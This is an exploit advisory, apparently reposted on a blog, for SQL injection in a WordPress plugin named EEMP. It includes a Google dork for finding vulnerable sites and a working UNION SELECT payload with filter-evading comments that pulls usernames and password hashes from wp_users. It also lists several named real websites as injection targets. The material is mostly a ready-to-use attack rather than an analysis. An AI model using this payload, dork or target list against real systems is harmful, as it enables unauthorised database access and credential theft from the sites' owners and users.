# Exploit Title -> WordPress EEMP plugin SQL Injection Vulnerablity
# Category -> WebApps
# Google Dork -> inurl:"/wp-content/plugins/EEMP/"
# Platform -> PHP
# Version -> All Versions Infected
# Security Risk -> High
[~] Vulnerability Description
[~] Exploit
[~] Real.Demo
[~] Vulnerability Description [~] :
===========================
You can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database.
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
[~] P0c [~] :
============
Vuln file in :
http://Localhost/{Path}/wp-content/plugins/EEMP/EEMP.php?EEMPid=[Number] <<-----|
[~] Exploit [~] :
=========
http://3plshow.com.au/Melbourne/wp-content/plugins/EEMP/EEMP.php?EEMPid=-1/*!UnIOn*/+all+/*!SELeCt*/1,2,/*!cOnCat(user_login,0x3a,user_pass)*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+wp_users--+MCS
[~] D3m0 [~] :
=============
[#] http://3plshow.com.au/Melbourne/wp-content/plugins/EEMP/EEMP.php?EEMPid=1[Inj3ct Here]
[#] http://giftfairevents.com.au/wp-content/plugins/EEMP/EEMP.php?EEMPid=1[Inj3ct Here]
[#] http://www.odma-2013.com.au/wp-content/plugins/EEMP/EEMP.php?EEMPid=1[Inj3ct Here]
=================================
[#] http://www.odma-2013.com.au/wp-content/plugins/EEMP/EEMP.php?EEMPid=1[Inj3ct Here]
=================================
Aucun commentaire:
Enregistrer un commentaire